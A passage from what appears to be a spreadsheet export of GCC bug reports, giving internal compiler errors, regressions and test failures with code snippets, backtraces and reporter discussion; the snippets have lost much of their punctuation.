  if (any (a .ne. (/1004/))) call abort ()
end
and
module global
  type :: a
    integer :: b
    integer :: c
  end type a
  interface assignment(=)
    module procedure a_to_a
  end interface
  interface operator(.ne.)
    module procedure a_ne_a
  end interface
  type(a) :: x(4) y(4) z(4) u(4 4)
  logical :: l1(4) t = .true. f= .false.
contains
!******************************************************************************
  elemental subroutine a_to_a (m n)
    type(a) intent(in) :: n
    type(a) intent(out) :: m
    m%b = n%b + 1
    m%c = n%c
  end subroutine a_to_a
!******************************************************************************
  elemental logical function a_ne_a (m n)
    type(a) intent(in) :: n
    type(a) intent(in) :: m
    a_ne_a = (m%b .ne. n%b) .or. (m%c .ne. n%c)
  end function a_ne_a
!******************************************************************************
  elemental function foo (m)
    type(a) :: foo
    type(a) intent(in) :: m
    foo%b = 0
    foo%c = m%c
  end function foo  
end module global
!******************************************************************************
program test
  use global
  x = (/a (0 1)a (0 2)a (0 3)a (0 4)/)
  y = x
  z = x
  l1 = (/t f f t/)
  call test_where_3
  if (any (y .ne. (/a (1 0)a (1 2)a (1 3)a (1 0)/))) call abort ()
!  y = x
!  call test_where_forall_1
!  if (any (u(4 :) .ne. (/a (1 4)a (2 2)a (2 3)a (1 4)/))) call abort ()
contains
!******************************************************************************
  subroutine test_where_3        ! Test a simple WHERE with a function assignment
    where (.not. l1) y = foo (x)
  end subroutine test_where_3
!******************************************************************************
!  subroutine test_where_forall_1 ! Test a WHERE in a FORALL block
!    forall (i = 1:4)
!      where (.not. l1)
!        u(i :) = x
!      elsewhere
!        u(i :) = a(0 i)
!      endwhere
!    end forall
!  end subroutine test_where_forall_1
!******************************************************************************
end program test 
The commented FORALL also gives the same ICE. However the simplified version of the last code:
program test
  integer :: x(4) y(4) z(4) u(4 4)
  logical :: l1(4) t = .true. f= .false.
  x = (/ 1 2 3 4/)
  l1 = (/t f f t/)
  y = 0
  where (.not. l1) y = x
  if (any (y .ne. (/0 2 3 0/))) call abort ()
end program test 
compiles and pass. Note also that the problem is also present in gcc 4.2.1.</t>
  </si>
  <si>
    <t>GCC-69504</t>
  </si>
  <si>
    <t>XMM register variable ICE with vector extensions</t>
  </si>
  <si>
    <t>xmm_register_variable_ICE.c:
#include 
#include 
typedef uint8_t u8x16_t __attribute__ ((vector_size (16)))
int main(void) {
  register u8x16_t u8x16 asm (xmm0)
  for (int i=0 i&lt;16 ++i) printf(%d\n u8x16[i])
  return 0
}
$ gcc-5 --version
gcc-5 (Debian 5.3.1-7) 5.3.1 20160121
Copyright (C) 2015 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ gcc-5 -O3 xmm_register_variable_ICE.c 
xmm_register_variable_ICE.c: In function â€˜mainâ€™:
xmm_register_variable_ICE.c:6:5: internal compiler error: in expand_expr_addr_expr_1 at expr.c:7736
 int main(void) {
     ^
0x669f89 expand_expr_addr_expr_1
	../../src/gcc/expr.c:7736
0xd85886 expand_expr_addr_expr
	../../src/gcc/expr.c:7850
0xd85886 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
	../../src/gcc/expr.c:10724
0xd894e0 expand_expr_real(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
	../../src/gcc/expr.c:8018
0xd894e0 expand_expr
	../../src/gcc/expr.h:254
0xd894e0 expand_expr_real_2(separate_ops* rtx_def* machine_mode expand_modifier)
	../../src/gcc/expr.c:8235
0xce38f7 expand_gimple_stmt_1
	../../src/gcc/cfgexpand.c:3462
0xce38f7 expand_gimple_stmt
	../../src/gcc/cfgexpand.c:3522
0xcdcb38 expand_gimple_basic_block
	../../src/gcc/cfgexpand.c:5534
0xcdcb38 execute
	../../src/gcc/cfgexpand.c:6152
Also ICEs with latest Debian snapshot:
gcc (Debian 20160105-1) 6.0.0 20160105 (experimental) [trunk revision 232093]</t>
  </si>
  <si>
    <t>adam.warner.nz</t>
  </si>
  <si>
    <t>GCC-68676</t>
  </si>
  <si>
    <t>ICE in gfc_match_formal_arglist when compiling gfortran.dg/submodule_10.f08</t>
  </si>
  <si>
    <t>Recent regression on alphaev68-linux-gnu fails several submodule_??.f08 tests [1]. The ICE can be triggered with a crosscompiler to alpha-linux-gnu:
~/gcc-build-alpha/gcc/f951 -O submodule_10.f08
f951: internal compiler error: Segmentation fault
0xb19d7f crash_signal
        ../../gcc-svn/trunk/gcc/toplev.c:334
0x5498e5 gfc_match_formal_arglist(gfc_symbol* int int)
        ../../gcc-svn/trunk/gcc/fortran/decl.c:4829
0x54c88b gfc_match_subroutine()
        ../../gcc-svn/trunk/gcc/fortran/decl.c:6016
0x5a52f5 decode_statement
        ../../gcc-svn/trunk/gcc/fortran/parse.c:378
gdb session:
Starting program: /home/uros/gcc-build-alpha/gcc/f951 -O submodule_10.f08
Program received signal SIGSEGV Segmentation fault.
0x00000000005498e5 in gfc_match_formal_arglist (progname=0x175b330 st_flag=0 null_flag=1) at ../../gcc-svn/trunk/gcc/fortran/decl.c:4829
4829          if (!sym-&gt;abr_modproc_decl &amp;&amp; formal &amp;&amp; !head)
(gdb) p sym
$1 = (gfc_symbol *) 0x0
(gdb) list
4824          if (!formal &amp;&amp; head)
4825            arg_count_mismatch = true
4826
4827          /* Abbreviated module procedure declaration is not meant to have any
4828             formal arguments!  */
4829          if (!sym-&gt;abr_modproc_decl &amp;&amp; formal &amp;&amp; !head)
4830            arg_count_mismatch = true
4831
4832          for (p = formal q = head p  p = p-&gt;next q = q-&gt;next)
4833            {
(gdb) bt
#0  0x00000000005498e5 in gfc_match_formal_arglist (progname=0x175b330 st_flag=0 null_flag=1) at ../../gcc-svn/trunk/gcc/fortran/decl.c:4829
#1  0x000000000054c88c in gfc_match_subroutine () at ../../gcc-svn/trunk/gcc/fortran/decl.c:6016
#2  0x00000000005a52f6 in decode_statement () at ../../gcc-svn/trunk/gcc/fortran/parse.c:378
#3  0x00000000005a6a58 in next_free () at ../../gcc-svn/trunk/gcc/fortran/parse.c:1076
#4  0x00000000005a6de9 in next_statement () at ../../gcc-svn/trunk/gcc/fortran/parse.c:1310
#5  0x00000000005a95af in parse_contained (module=1) at ../../gcc-svn/trunk/gcc/fortran/parse.c:5038
#6  0x00000000005a99ad in parse_module () at ../../gcc-svn/trunk/gcc/fortran/parse.c:5431
sym is dereferenced when NULL.
[1] https://gcc.gnu.org/ml/gcc-testresults/2015-12/msg00267.html</t>
  </si>
  <si>
    <t>GCC-10762</t>
  </si>
  <si>
    <t>[3.4 regression] [New parser] failure on illegal templated type declared with 'using'</t>
  </si>
  <si>
    <t xml:space="preserve">From: Dara Hazeghi 
To: gcc-gnats@gcc.gnu.org nobody@gcc.gnu.org
Cc:  
Subject: Re: c++/10762: parser failure on illegal templated type declared with 'using'
Date: Mon 12 May 2003 22:27:26 -0700
 http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view%20audit- 
 trail&amp;database=gcc&amp;pr=10762
 Hello
 this testcase works fine on gcc 3.2 and 3.3 branch but not on mainline  
 (20030512) making this is a regression.
 Dara
</t>
  </si>
  <si>
    <t>GCC-83095</t>
  </si>
  <si>
    <t>[8 regression] many tests fail starting with r255001</t>
  </si>
  <si>
    <t>This is on powerpc64 BE only.  I am not seeing the failures on LE.
Failing test cases (note that they are all compiled with -Os -O2 and other -O values work):
&gt; FAIL: gcc.c-torture/execute/20041218-1.c   -Os  execution test
&gt; FAIL: gcc.c-torture/execute/pr51877.c   -Os  execution test
&gt; FAIL: gcc.dg/atomic/stdatomic-generic.c   -Os  execution test
&gt; FAIL: gfortran.dg/aliasing_dummy_1.f90   -Os  execution test
&gt; FAIL: gfortran.dg/array_function_5.f90   -Os  execution test
&gt; FAIL: gfortran.dg/dependency_25.f90   -Os  execution test
&gt; FAIL: gfortran.dg/derived_constructor_comps_5.f90   -Os  execution test
&gt; FAIL: gfortran.dg/derived_constructor_comps_6.f90   -Os  execution test
&gt; FAIL: gfortran.dg/derived_init_2.f90   -Os  execution test
&gt; FAIL: gfortran.dg/dtio_7.f90   -Os  execution test
&gt; FAIL: gfortran.dg/matmul_3.f90   -Os  execution test
&gt; FAIL: gfortran.dg/mvbits_7.f90   -Os  execution test
&gt; FAIL: gfortran.dg/select_type_39.f03   -Os  execution test
&gt; FAIL: gfortran.dg/unlimited_polymorphic_1.f03   -Os  execution test
I looked through a couple of them and they are failing when some value is not what is expected and abort is called.
Looking at the first one:
seurer@makalu-lp1:~/gcc/build/gcc-test2$ /home/seurer/gcc/build/gcc-test2/gcc/xgcc -B/home/seurer/gcc/build/gcc-test2/gcc/ /home/seurer/gcc/gcc-test2/gcc/testsuite/gcc.c-torture/execute/20041218-1.c  -fno-diagnostics-show-caret -fdiagnostics-color=never    -Os  -w  -lm    -o ./20041218-1.exe
seurer@makalu-lp1:~/gcc/build/gcc-test2$ ./20041218-1.exe 
Aborted (core dumped)
seurer@makalu-lp1:~/gcc/build/gcc-test2$ /home/seurer/gcc/build/gcc-test2/gcc/xgcc -B/home/seurer/gcc/build/gcc-test2/gcc/ /home/seurer/gcc/gcc-test2/gcc/testsuite/gcc.c-torture/execute/20041218-1.c  -fno-diagnostics-show-caret -fdiagnostics-color=never  -g  -Os  -w  -lm    -o ./20041218-1.exe
seurer@makalu-lp1:~/gcc/build/gcc-test2$ gdb ./20041218-1.exe 
(gdb) run
Program received signal SIGABRT Aborted.
0x00003fffb7cd129c in .raise () from /lib64/libc.so.6
Missing separate debuginfos use: debuginfo-install glibc-2.17-196.el7.ppc64
(gdb) where
#0  0x00003fffb7cd129c in .raise () from /lib64/libc.so.6
#1  0x00003fffb7cd34a8 in .abort () from /lib64/libc.so.6
#2  0x0000000010000764 in check (x= x@entry=0x10000a34 y= y@entry=0x10010fd8 )
    at /home/seurer/gcc/gcc-test2/gcc/testsuite/gcc.c-torture/execute/20041218-1.c:51
#3  0x00000000100007e0 in bar (y= x=1) at /home/seurer/gcc/gcc-test2/gcc/testsuite/gcc.c-torture/execute/20041218-1.c:72
#4  0x0000000010000520 in foo (z= y=1 x=) at /home/seurer/gcc/gcc-test2/gcc/testsuite/gcc.c-torture/execute/20041218-1.c:94
#5  main () at /home/seurer/gcc/gcc-test2/gcc/testsuite/gcc.c-torture/execute/20041218-1.c:115</t>
  </si>
  <si>
    <t>GCC-77393</t>
  </si>
  <si>
    <t>[7 Regression] Revision r237735 changed the behavior of F0.0</t>
  </si>
  <si>
    <t>This PR is motivated by the thread at https://groups.google.com/forum/#!topic/comp.lang.fortran/lH-Pi0MbZZ4
Before revision r237735 the output of the following test
print (f0.0) huge(1.0)
print (f0.0) huge(1.0_8)
print (f0.0) huge(1.0_10)
print (f0.0) huge(1.0_16)
end
was
340282346638528859811704183484516925440.
179769313486231570814527423731704356798070567525844996598917476803157260780028538760589558632766878171540458953514382464234321326889464182768467546703537516986049910576551282076245490090389328944075868508455133942304583236903222948165808559332123348274797826204144723168738177180919299881250404026184124858368.
1189731495357231765021263853030970205169063322294624200440323733891737005522970722616410290336528882853545697807495577314427443153670288434198125573853743678673593200706973263201915918282961524365529510646791086614311790632169778838896134786560600399148753433211454911160088679845154866512852340149773037600009125479393966223151383622417838542743917838138717805889487540575168226347659235576974805113725649020884855222494791399377585026011773549180099796226026859508558883608159846900235645132346594476384939859276456284579661772930407806609229102715046085388087959327781622986827547830768080040150694942303411728957777100335714010559775242124057347007386251660110828379119623008469277200965153500208474470792443848545912886723000619085126472111951361467527633519562927597957250278002980795904193139603021470997035276467445530922022679656280991498232083329641241038509239184734786121921697210543484287048353408113042573002216421348917347174234800714880751002064390517234247656004721768096486107994943415703476320643558624207443504424380566136017608837478165389027809576975977286860071487028287955567141404632615832623602762896316173978484254486860609948270867968048078702511858930838546584223040908805996294594586201903766048446790926002225410530775901065760671347200125846406957030257138960983757998926954553052368560758683179223113639519468850880771872104705203957587480013143131444254943919940175753169339392366881856189129931729104252921236835159922322050998001677102784035360140829296398115122877768135706045789343535451696539561254048846447169786893211671087229088082778350518228857646062218739702851655083720992349483334435228984751232753726636066213902281264706234075352071724058665079518217303463782631353393706774901950197841690441824738063162828586857741432581165364040218402724913393320949219498422442730427019873044536620350262386957804682003601447291997123095530057206141866974852846856186514832715974481203121946751686379343096189615107330065552421485195201762858595091051839472502863871632494167613804996319791441870254302706758495192008837915169401581740046711477877201459644461175204059453504764721807975761111720846273639279600339670470037613374509553184150073796412605047923251661354841291884211340823015473304754067072818763503617332908005951896325207071673904547777129682265206225651439919376804400292380903112437912614776255964694221981375146967079446870358004392507659451618379811859392049544036114915310782251072691486979809240946772142727012404377187409216756613634938900451232351668146089322400697993176017805338191849981933008410985993938760292601390911414526003720284872132411955424282101831204216104467404621635336900583664606591156298764745525068145003932941404131495400677602951005962253022823003631473824681059648442441324864573137437595096416168048024129351876204668135636877532814675538798871771836512893947195335061885003267607354388673368002074387849657014576090349857571243045102038730494854256702479339322809110526041538528994849203991091946129912491633289917998094380337879522093131466946149705939664152375949285890960489916121944989986384837022486672249148924678410206183364627416969576307632480235587975245253737035433882960862753427740016333434055083537048507374544819754722228975281083020898682633020285259923084168054539687911418297629988964576482765287504562854924265165217750799516259669229114977788962356670956627138482018191348321687995863652637620978285070099337294396784639879024914514222742527006363942327998483976739987154418554201562244154926653014515504685489258620276085761837129763358761215382565129633538141663949516556000264159186554850057052611431952919918807954522394649627635630178580896692226406235382898535867595990647008385687123810329591926494846250768992258419305480763620215089022149220528069842018350840586938493815498909445461977893029113576516775406232278298314033473276603952231603422824717528181818844304880921321933550869873395861276073670866652375555675803171490108477320096424318780070008797346032906278943553743564448851907191616455141155761939399690767415156402826543664026760095087523945507341556135867933066031744720924446513532366647649735400851967040771103640538150073486891798364049570606189535005089840913826869535090066783324472578712196604415284924840041850932811908963634175739897166596000759487800619164094854338758520657116541072260996288150123144377944008749301944744330784388995701842710004808305012177123560622895076269042856800047718893158089358515593863176652948089031267747029662545110861548958395087796755464137944895960527975209874813839762578592105756284401759349324162148339565350189196811389091843795734703269406342890087805846940352453479398080674273236297887100867175802531561302356064878709259865288416350972529537091114317204887747405539054009425375424119317944175137064689643861517718849867010341532542385911089624710885385808688837777258648564145934262121086647588489260031762345960769508849149662444156604419552086811989770240.
1189731495357231765085759326628007016196469052641694045529698884212163579755312392324974012848462073525902033564749126859755265433573804462672698751945261490853461958725021262845865799405404493574681566096686172574953791792292256220777095858112702436475442537092608935138247345677279593806773692330094615746119725784172889892521939920757654204864565673356452247278152288867700638935595456496699511441752909606878513250948311396886100526833092128683974752192266386791880873694343077348155564101669971138512786874753496996549221727686770196551512812712488289469952298031867469924683981576664562667786719061499639630341657098305425237220876664630087808767256182803220212219924852375903049520911395910918921205273496768588119030111593018789368039232011671404175845108854706965215605777113516257404818817695075025715299705916714352103671782759119316034498392169720631800164034124698918142227577300459309880454715179606299895507583075851195185857971173167676966057998899352631885417716295302014668802384075846036226606480142977595407135050379808649130157164024060311786908796372510335873512774795275748595417572920936651398752709055215663939505589207804914540432978557623565645991208599669097180808881920063722771431218489011922209679053545963628417326002439732802939524313786668514027381434321036636571171670423586472759561231970793967839279147282720195377060602122638457883204809341717526809639253539447730280863675704796054050525162959099932535265586464682793821550087166946662209865086040990507131145474267411042839542322762994938759613112743837192839682676257555388372814490845395747128162065871588219108887240116651361962050800029176299938826082417547516732269930473133261258921845516815235455354310458114528303607394526100730578774092094736822286015459361126642549541799645333882549670764145955017051330800061253865140180153211929361456500343514792890205532021760061882232615736553377294980974059590520187961459799386741513028505934410453603480192383349321115171811051004108592830991811382552909064873029533418691087118107895004426881765865961841419267486232005929789956207494587649901662172318722999484512325826087031561936383689740686505279775296789331613683822798597040651600524129025149894873153196942095056670847466927644812596506700129443579512479230621373978088731257089799622902183824105412930483065603459863120371744282301377070153823878609951218937542956964157950988060608985782910656238116142203574104757451828170804875257446204128348513829082731722364189380493588338947664370623279820755831646205417488393062838201789547219543194450902113699925965376908192792152122212824578879336506875288617303469517112245451315447164280392523574962804175375927948971096983905242318797695347043690474223813266505639761164438844266531364626851219633994434154098562127395936184421821444273431534507860161614287022720984061569660333372788241037131538077377480152670583257920535569973318188112685673318997967497786786001251403873023920127717626858627038170562807276699687356274072773403132694104831615879354395811585825112837841563222761623334459188131537882355732483030085976890382969734476214593428191212717141333047577867552218517431064848760373196290310124466145087078377140528533048684204278799596652514009368964527494988719996088230065668196236298805733689960371306226158464997243490564472254071897564144128539839986096045563264771285585066304177995720101744844387158329767375560416207800878830072072413908657855667239546369357775781344288195989176313356856417845434232814886744226746707066979755577121788798468777700116472954103621810567107869855646414713502627836321256957407217461738363552424248762436478085351810995749293238174081331905048144612700905541425702220302537611494824228765324577933778519818778697340282580912780674979058938062556856001076057705982166686824756037569615760497619819482052758118532729333127733603742149847001463931981340719681330844408263017545241644293372483217234561694263937855759294448662979095419227451801588425977869694026601427919655168415895923043115191751872713346095752634608254475988154162254952597853199039645883742199236387610395830948074365988397707849632252080920941206268114832425403540515474312327876180802357701527842702008781378306569508588571830140611098042683009530862797403015355464377406249853964481000402231771665700893607521804084523668568649103258862666293372472441435563520595461701042390500795615834505944837326652542467444364861499184275097485253621979537504128523848241127715641240965261646703516395599407360083455079665191393229410544185167999099787655424462558900874388405649169453726739312260234815543297842308646072190147948072928456725835039546121182133640777769925841807579051735838823112759622714067509669913645288281894558925612972425252452248453502562347348900936766966136332741088135837550717443838484760651019872222926016920811114616937143207743488504602012776364256746872315205952601072228970686460932435222754496341763535189105548847634608972381760403137363968.
Starting at that revision the output became
340282346638528859811704183484516925440.
a.out(420200x7fff78eb2000) malloc: *** error for object 0x7fff5f902ed0: pointer being freed was not allocated
*** set a breakpoint in malloc_error_break to debug
Program received signal SIGABRT: Process abort signal.
The only relevant part of the standard I have found is
&gt; 10.7.2.3.2 F editing
&gt; 1 The Fw.d edit descriptor indicates that the field occupies w positions
&gt; except when w is zero in which case the processor selects the field width.
&gt; The fractional part of the field consists of d digits.
&gt; On input w shall not be zero.
I am not 100% sure about the interpretation of the processor selects the field width but I understand it as the minimal width to output the number without *. If I am correct the expected behavior is the one before r237735.
Note that the following code
print (f8.0) huge(1.0)
print (f18.0) huge(1.0_8)
print (f20.0) huge(1.0_10)
print (f40.0) huge(1.0_16)
end
gives
********
******************
********************
****************************************
before r237735 and
********
******************
Program received signal SIGSEGV: Segmentation fault - invalid memory reference.
after it.</t>
  </si>
  <si>
    <t>GCC-51476</t>
  </si>
  <si>
    <t>[c++0x] [4.7 Regression] ICE with invalid pointer-to-member template parameter</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on trunk when compiled with -std=c++0x:
=============================
template struct A {}
struct B
{
  int i
  A&lt;
}
=============================
bug.cc:6:10: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-57545</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] Generation of debug symbols leads to internal compiler error</t>
  </si>
  <si>
    <t>Created attachment 30269
test case leading to internal compiler error
Enabling the generation of debug symbols leads to an internal compiler error (segmentation fault). A preprocessed minimal example is attached. The problem is reproducible in g++ versions 4.7.2 4.7.3 4.8.0 and 4.8.1. Version 4.7.1 is the last version where I did not encounter any problems.
// code
template
struct array {
    T data[N]
}
template
struct derived {
    typedef long unsigned int size_type
    static const size_type n = 42
    array a
}
// compile
$ g++ -g -Wall -Wextra -save-temps test-case.cpp
test-case.cpp:12:2: internal compiler error: Segmentation fault
 }
  ^
0x89f8ff crash_signal
	../../gcc-4.8.1/gcc/toplev.c:332
0x897567 bit_from_pos(tree_node* tree_node*)
	../../gcc-4.8.1/gcc/stor-layout.c:799
0x6ad653 field_byte_offset
	../../gcc-4.8.1/gcc/dwarf2out.c:14351
0x6b72e9 add_data_member_location_attribute
	../../gcc-4.8.1/gcc/dwarf2out.c:14577
0x6c3c89 gen_field_die
	../../gcc-4.8.1/gcc/dwarf2out.c:18697
0x6bfa4f gen_decl_die
	../../gcc-4.8.1/gcc/dwarf2out.c:20072
0x6c0d37 gen_member_die
	../../gcc-4.8.1/gcc/dwarf2out.c:19031
0x6c0d37 gen_struct_or_union_type_die
	../../gcc-4.8.1/gcc/dwarf2out.c:19117
0x6c0d37 gen_tagged_type_die
	../../gcc-4.8.1/gcc/dwarf2out.c:19307
0x6c1a2e gen_type_die_with_usage
	../../gcc-4.8.1/gcc/dwarf2out.c:19454
0x6c2142 gen_type_die
	../../gcc-4.8.1/gcc/dwarf2out.c:19493
0x6c2142 modified_type_die
	../../gcc-4.8.1/gcc/dwarf2out.c:10163
0x6c2f70 force_type_die
	../../gcc-4.8.1/gcc/dwarf2out.c:19789
0x6c37f9 get_context_die
	../../gcc-4.8.1/gcc/dwarf2out.c:19704
0x6c37f9 scope_die_for
	../../gcc-4.8.1/gcc/dwarf2out.c:16419
0x6c15d9 gen_type_die_with_usage
	../../gcc-4.8.1/gcc/dwarf2out.c:19349
0x6c2ebe gen_type_die
	../../gcc-4.8.1/gcc/dwarf2out.c:19493
0x6c2ebe modified_type_die
	../../gcc-4.8.1/gcc/dwarf2out.c:10095
0x6c3a2b add_type_attribute
	../../gcc-4.8.1/gcc/dwarf2out.c:16497
0x6bad18 generic_parameter_die
	../../gcc-4.8.1/gcc/dwarf2out.c:10356
$ g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/apps/gcc/gcc-4.8.1/libexec/gcc/x86_64-pc-linux-gnu/4.8.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-4.8.1/configure --prefix=/apps/gcc/gcc-4.8.1 --build=x86_64-pc-linux-gnu --enable-bootstrap --enable-checking=release --enable-__cxa_atexit --enable-languages=cc++fortran --enable-libgomp --enable-libmudflap --enable-lto --enable-multilib --enable-nls --enable-shared --enable-threads=posix --with-system-zlib --enable-cloog-backend=isl --with-cloog=/home/hpc/severin/apps/cloog/cloog-0.18.0 --with-cloog-include=/home/hpc/severin/apps/cloog/cloog-0.18.0/include/ --with-ppl=/home/hpc/severin/apps/ppl/ppl-1.0
Thread model: posix
gcc version 4.8.1 (GCC)</t>
  </si>
  <si>
    <t>GCC-46003</t>
  </si>
  <si>
    <t>cond5.C fails for ARM EABI tests.</t>
  </si>
  <si>
    <t>The test cond5.C fails for testing with arm-eabi in the following manner. 
/arm/scratch/pdtltest/work/sandboxes/fsf/trunk/source/gcc-fsf/gcc/testsuite/g++.dg/template/cond5.C: In function 'void foo(const A&amp;)':
/arm/scratch/pdtltest/work/sandboxes/fsf/trunk/source/gcc-fsf/gcc/testsuite/g++.dg/template/cond5.C:9:55: internal compiler error: in build_target_expr at cp/tree.c:287
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The compiler was configured with the following options:
 --with-cpu=cortex-a9 --with-float=softfp --with-fpu=neon</t>
  </si>
  <si>
    <t>GCC-14992</t>
  </si>
  <si>
    <t>--as-needed patch makes -shared-libgcc the default on some systems</t>
  </si>
  <si>
    <t>Summary
-------
The following 3.4 patch:
2004-04-01  Alan Modra  
	    Jakub Jelinek  
	* gcc.c (init_gcc_specs): If HAVE_LD_AS_NEEDED link with
	-lgcc --as-needed -lgcc_s --no-as-needed by default.
	* configure.ac (HAVE_LD_AS_NEEDED): Check for ld --as-needed.
	* configure: Rebuilt.
	* config.in: Rebuilt.
	* Makefile.in (stage1-start): Copy also libgcc_s*$(SHLIB_EXT).
	(stage2-start stage3-start stage4-start): Likewise.
	(stageprofile-start stagefeedback-start): Likewise.
effectively makes -shared-libgcc the default for mips-sgi-irix6.5 when
using binutils 2.15.  This seems undesirable for its own sake and breaks
bootstrap unless you take elaborate countermeasures.  It also wasn't the
intended effect of the patch.
Although the problem only seems to have been reported for IRIX so far
I believe it could occur on most hosted non-glibc ELF systems if
binutils 2.15 is used.
Detail
------
The rationale for the patch can be found here:
    http://gcc.gnu.org/ml/gcc-patches/2004-03/msg02210.html
As I understand it the problem described in the message above can be
solved simply by linking with -shared-libgcc.  The purpose of the patch
is to make this extra option unnecessary.
It seems that on glibc systems symbols in libgcc_s.so are only
referenced by code that needs to use the EH routines.  The default
behaviour can therefore be to link against libgcc_s.so as needed.
Unfortunately the patch seems to be very invasive.  It changes the
default link line for all targets whose binutils support --as-needed
linking of shared libraries.  And not all targets follow the glibc model
wrt EH routines.
An initial posting about the problem can be found here:
    http://gcc.gnu.org/ml/gcc-patches/2004-04/msg00855.html
It boils down to target-specific variations in crtbegin.o.
In particular crtstuff.c contains:
--------------------------------------------------------------------
#if defined(OBJECT_FORMAT_ELF) &amp;&amp; defined(HAVE_LD_EH_FRAME_HDR) \
    &amp;&amp; !defined(inhibit_libc) &amp;&amp; !defined(CRTSTUFFT_O) \
    &amp;&amp; defined(__GLIBC__) &amp;&amp; __GLIBC__ &gt;= 2
#include 
# if (__GLIBC__ &gt; 2 || (__GLIBC__ == 2 &amp;&amp; __GLIBC_MINOR__ &gt; 2) \
     || (__GLIBC__ == 2 &amp;&amp; __GLIBC_MINOR__ == 2 &amp;&amp; defined(DT_CONFIG)))
#  define USE_PT_GNU_EH_FRAME
# endif
#endif
#if defined(EH_FRAME_SECTION_NAME) &amp;&amp; !defined(USE_PT_GNU_EH_FRAME)
# define USE_EH_FRAME_REGISTRY
#endif
--------------------------------------------------------------------
....
--------------------------------------------------------------------
#ifdef USE_EH_FRAME_REGISTRY
  static struct object object
  if (__register_frame_info)
    __register_frame_info (__EH_FRAME_BEGIN__ 
#endif
--------------------------------------------------------------------
Thus if a system doesn't satisfy the __GLIBC__ check above and uses a
.eh_frame section then crtbegin.o will include a call to the weak function
__register_frame_info.  Since this function is provided by libgcc_s.so
any program linked with crtbegin.o will end up requiring libgcc_s.so
when linked with --as-needed -lgcc_s.
As I said above this effectively makes --shared-libgcc the default
on IRIX and probably other ELF systems that don't satisfy the __GLIBC__
check.  This is an unannounced (and IMO undesirable) change in behaviour.
It also causes bootstrap problems because LD_LIBRARY_PATH (or whatever)
doesn't typically include the gcc/ and gcc/stage* directories that are
necessary for finding the new libgcc_s.so.  Anything built by the stage1
compiler will therefore fail to run.
I'm not sure how much to read into the fact that the problem has only been
reported for IRIX so far.  However I suspect folks probably haven't had
that much opportunity to trip over it.  They'll only have noticed if:
  (1) They tested a 3.4 snapshot from the last two weeks.  (The patch
      was only applied at the beginning of April.)
  (2) They tested with a recent CVS version of binutils (cvs HEAD since
      18th March or 2.15 branch since 8th April.)
  (3) Not only do they test with CVS versions of binutils but they
      build binutils separately from gcc itself.  If you use a combined
      tree instead ./configure will look for binutils 2.16 or above
      and not even CVS mainline has a version number that high.  The
      only way the ./configure check can pass is if you have a
      preinstalled linker that supports --as-needed.
As Jakub says here:
    http://gcc.gnu.org/ml/gcc-patches/2004-04/msg00857.html:
the proper fix is probably to tighten the check in gcc.c:
---------------------------------------------------------------------
So probably the #if conditional in init_gcc_specs needs to be
#if defined HAVE_LD_AS_NEEDED &amp;&amp;
test_whether_USE_EH_FRAME_REGISTRY_will_not_be_defined
The question is how to find that out since in crtstuff.c it uses target
headers to find that out but we don't have such luxury in gcc.c.
Ideas?
---------------------------------------------------------------------
Unfortunately no-one has yet suggested a viable way of doing this.
FWIW a band-aid fix for IRIX is:
    http://gcc.gnu.org/ml/gcc-patches/2004-04/msg00931.html
However if I'm not completely overegging the potential fallout
I wonder if would be better to revert the patch for now and perhaps
revisit it for 3.4.1?
Richard</t>
  </si>
  <si>
    <t>GCC-28262</t>
  </si>
  <si>
    <t>Inconsistent default arguments are only permitted for function parameters.</t>
  </si>
  <si>
    <t>Description:
  g++ appears to have issues when declaring function pointer types that accept default function parameters. However it does not have issues when declaring non-pointer function types that accept default function parameters. For example the following code:
  typedef void (* funcptr) (int = 10)
  Produces the error default arguments are only permitted for function parameters. However a workaround for this exists. The following code compiles without problems and the default parameter works:
  typedef void (funcptrhack) (int = 10)
  typedef funcptrhack * funcptr
  I believe this is a bug because a workaround exists and because of the inconsistency. Additionally this problem does not seem to occur on pre-3.4.2 versions of GCC (the next lowest version tested was 3.3.3 not sure where in that range it started failing). However I am not sure what the bug is: I believe that either both of the above examples should succeed or both should fail.
Buggy behavior observed on versions:
  3.4.2 [g++.exe (GCC) 3.4.2 (mingw-special)]
  3.4.3 [specific version unavailable]
  3.4.4 [specific version unavailable]
  3.4.4 [g++ (GCC) 3.4.4 (cygming special) (gdc 0.12 using dmd 0.125)]
  3.4.5 [g++ (GCC) 3.4.5 (Gentoo 3.4.5 ssp-3.4.5-1.0 pie-8.7.9)]
  4.0.3 [Ubuntu 4.0.3-1ubuntu5]
Working behavior observed on versions:
  3.2   [g++ (GCC) 3.2 20020903 (Red Hat Linux 8.0 3.2-7)]
  3.2.2 [specific version unavailable]
  3.3.3 [specific version unavailable]
Configuration options unavailable. Some system types and GCC versions unavailable as indicated above.
Preprocessed output for both cases follows:
---
Buggy output compiled with:
  g++ -W -Wall -pedantic
Preprocessed file:
# 1 gccbug.cpp
# 1 
# 1 
# 1 gccbug.cpp
typedef void (* funcptr) (int = 10)
void testfunc (int) {
}
int main (int char **) {
  funcptr fp = 
  (*fp)()
  (*fp)(20)
  return 0
}
---
Working output compiled with:
  g++ -W -Wall -pedantic
Preprocessed file:
# 1 gccbug.cpp
# 1 
# 1 
# 1 gccbug.cpp
typedef void (funcptrhack) (int = 10)
typedef funcptrhack * funcptr
void testfunc (int) {
}
int main (int char **) {
  funcptr fp = 
  (*fp)()
  (*fp)(20)
  return 0
}
---
-Jason</t>
  </si>
  <si>
    <t>jason.cipriani</t>
  </si>
  <si>
    <t>GCC-40501</t>
  </si>
  <si>
    <t>[4.5 Regression] error: invalid conversion in gimple call</t>
  </si>
  <si>
    <t>I just tried to compile the Suse Linux package libbeecrypt6-4.1.2-2.51
